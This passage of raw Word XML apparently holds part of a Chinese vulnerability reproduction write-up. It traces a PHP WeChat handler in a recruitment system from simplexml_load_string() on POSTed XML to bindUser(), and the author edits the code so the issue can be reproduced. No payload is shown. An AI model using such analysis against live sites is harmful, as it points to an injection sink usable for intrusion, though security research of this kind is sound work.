          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>然后进行了判断</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$postStr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>是否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不为空，如果不为空则调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> simplexml_load_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>字符串载入对象中。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然后通过对象名赋值给其它变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$fromUsername </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343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继续往下读：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="343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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman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27" type="#_x0000_t202" style="width:319.25pt;height:413.6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245" w:lineRule="exact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$MsgType=='event')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1" w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="204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ind w:left="2748" w:right="384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$MsgEvent = $postObj-&gt;Event; if ($MsgEvent=='subscribe')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="1055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292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9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spacing w:line="264" w:lineRule="exact"/>
                    <w:ind w:right="2231" w:firstLine="2748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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$centerStr = "&lt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>Content&gt;&lt;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![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CDATA[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>欢迎您关注</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="220" w:lineRule="auto"/>
                    <w:ind w:right="-6"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>".</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>iconv(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>'gbk','utf-8',$this-&gt;config['sy_webname'])."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">\n </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>1</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>：您可以直接回复关键字如【销售】、【南京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销售】、【南京</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-45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销售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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>XX</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-67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公司】查找您想要的职位</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>\n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-67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绑定您的账户体验更多精彩功能</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>\n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-67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感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谢您的关注！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>]]&gt;&lt;/Content&gt;";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2"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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$this-&gt;MsgType =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1" w:line="245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'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text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';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="3663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}elseif</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F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($MsgEvent=='CLICK')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spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="1055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line="245" w:lineRule="exact"/>
                    <w:ind w:right="533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$EventKey =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F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$postObj-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>EventKey;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$EventKey=='myaccount'){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ind w:left="1690" w:right="1194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bindUser(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9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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>我的消息</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8" w:line="245" w:lineRule="exact"/>
                    <w:ind w:right="168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line="245" w:lineRule="exact"/>
                    <w:ind w:left="1690" w:right="1194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myMsg(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$fromUsername);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26" type="#_x0000_t202" style="width:319.25pt;height:563.75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263" w:lineRule="exact"/>
                    <w:ind w:left="915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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>面试邀请</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:right="168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ind w:left="1690" w:right="1194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Audition(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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>简历查看</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="11"/>
                    <w:ind w:right="168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ind w:left="1690" w:right="1194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before="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lookResume(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spacing w:before="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"/>
                    <w:ind w:left="915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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>刷新简历</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:right="168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1" w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="1690" w:right="1194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line="245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refResume(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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>推荐职位</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="6"/>
                    <w:ind w:right="168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1" w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="366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line="245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recJob(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9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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>职位搜索</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>'){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22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22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p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spacing w:line="218" w:lineRule="auto"/>
                    <w:ind w:right="-8" w:firstLine="914"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$centerStr = "&lt;Content&gt;&lt;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![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CDATA[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>直接回复城市、职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pacing w:val="-3"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>位、公司名称等关键字搜索您需要的职位信息。</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-3"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>\n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-34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pacing w:val="-19"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>如：【经理】、【南</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-19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京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经理】、【南京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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>xx</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas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公司】</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>]]&gt;&lt;/Content&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="7"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="91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$this-&gt;MsgType = 'text</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:right="168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245" w:lineRule="exact"/>
                    <w:ind w:left="1055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"/>
                    <w:ind w:left="3663" w:hanging="706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w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>}elseif</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">($MsgType=='text'){ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>if($keyword){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ind w:left="3663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before="1" w:line="245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searchJob(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$keyword);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="1055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"/>
                    <w:ind w:right="353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ind w:left="295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 xml:space="preserve">$topStr = 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sprintf(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$topTpl,</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1" w:line="245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$fromUsername, $toUsername, $times, $this-&gt;MsgType);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10025" type="#_x0000_t202" style="width:319.25pt;height:61.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245" w:lineRule="exact"/>
                    <w:ind w:left="1690" w:right="1697"/>
                    <w:jc w:val="center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echo</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245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$topStr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.$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centerStr.$bottomStr;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1" w:line="245" w:lineRule="exact"/>
                    <w:ind w:right="770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245" w:lineRule="exact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" w:line="244" w:lineRule="exact"/>
                    <w:ind w:left="915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7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="317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这里先判断类型，如果点击，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$MsgEvent==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CLICK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia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则会调</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417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用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> bindUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（）方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="410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原本这段代码判断是否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我的帐号信息，但在环境搭建后可能是编码原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pacing w:val="-4"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>因，一直复现不成功，所以这里我改成了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-4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myaccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-30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所以才会去执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bindUser(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10024" type="#_x0000_t202" style="position:absolute;margin-left:89.75pt;margin-top:19.25pt;width:319.5pt;height:48.9pt;z-index:272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41"/>
                    <w:ind w:left="2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$EventKey=='myaccount'){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="78"/>
                    <w:ind w:left="2397" w:right="2566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$centerStr =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80"/>
                    <w:ind w:left="2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bindUser(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$fromUsername);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spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="32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这里调用了这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bindUser()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法，所以这里跟进一下这个方法是做什</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="538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么的。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Code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:286</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s10013" style="position:absolute;margin-left:89.75pt;margin-top:19.15pt;width:227.5pt;height:98.05pt;z-index:2776;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1795,383" coordsize="4550,1961">
            <v:rect id="_x0000_s10023" style="position:absolute;left:1795;top:383;width:4550;height:2" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s10022" style="position:absolute;left:1797;top:385;width:4545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10021" style="position:absolute;left:1797;top:711;width:4545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10020" style="position:absolute;left:1797;top:1037;width:4545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10019" style="position:absolute;left:1797;top:1363;width:4545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10018" style="position:absolute;left:6342;top:2015;width:3;height:329" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s10017" style="position:absolute;left:1795;top:2015;width:2;height:329" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s10016" style="position:absolute;left:1797;top:1689;width:4545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10015" style="position:absolute;left:1797;top:2015;width:4545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s10014" type="#_x0000_t202" style="position:absolute;left:1797;top:384;width:4545;height:1957" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="47"/>
                      <w:ind w:right="-1"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>private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 xml:space="preserve"> function bindUser($wxid='')</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="92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92"/>
                      <w:ind w:left="915" w:right="-1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$bindType =</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/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isBind(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$wxid);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="92" w:line="331" w:lineRule="auto"/>
                      <w:ind w:left="915" w:right="329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$this-&gt;MsgType = 'text'; return</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/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rFonts w:ascii="Consolas"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>bindType[</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>'cenetrTpl'];</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="3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pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322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将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
